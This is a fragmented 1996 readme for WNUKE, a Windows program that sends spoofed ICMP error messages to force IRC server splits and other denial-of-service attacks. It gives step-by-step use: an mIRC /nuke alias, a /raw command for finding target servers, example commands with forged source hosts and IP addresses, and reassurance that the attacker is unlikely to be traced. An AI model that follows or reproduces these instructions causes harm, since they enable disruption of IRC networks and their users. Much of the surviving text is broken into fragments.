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UKE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NUKE is a program for dispatching various ICMP error messages. With i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 cause  irc splits  and other denial  of sevice  attacks.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lains WNUKE use with mIRC, a popluar irc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Create an alias called /nuke in this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nuke /run wnuke.exe $1 $2 $3 $4 $5 $6 $7 $8 $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Connect, say to Blacksburg.VA.US.Undernet.o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. Write: /raw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see a similar re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&gt; SERVER: t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v 4 39S 9743C toronto.on.ca.undernet.org[199.166.230.9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Conn.!*@Blacksburg.VA.US.Undernet.Or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sburg.VA.US.Undernet.Org 203 Mlo__ ???? -3 [167.152.154.25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acksburg.VA.US.Undernet.Org 203 Mlo__ ???? -3 [194.133.7.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4. Select a server from this list of servers (do not select the ????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5. Type /nuke destination source port [icmp_param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as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uke Blacksburg.VA.US.Undernet.Org toronto.on.ca.undernet.org 0 UN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urce is the host where the error supposedly origin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cmp_params is a list of params you can see by running wnuk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pa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cases you can write an IP number instead of a ho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.e. in this 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nuke Blacksburg.VA.US.Undernet.Org 199.166.230.99 0 UNPROTOC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 The servers shold now report a split connection, however, WNUKE migh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 on all servers present. In fact, it will work only on  a few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.g. You  have to  find a server  it works  on). This  is  because  ic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notorious for mis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7. It is theoretically possible, that you are traced after an attac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 is small  however, as you  will probably  be working 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/PPP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8. WNUKE might not work on some WINSOCKs due to lack of RAW_SOCKET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on all versions of Trumpet WinSock how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. I am (the author) not responsible for any misuse or use of this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it intentional or otherwise. I also give no guarantie or statem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's behaviour on your machine (if it crashes, don't blame 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fu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MF, Slovenia - 08/06/1996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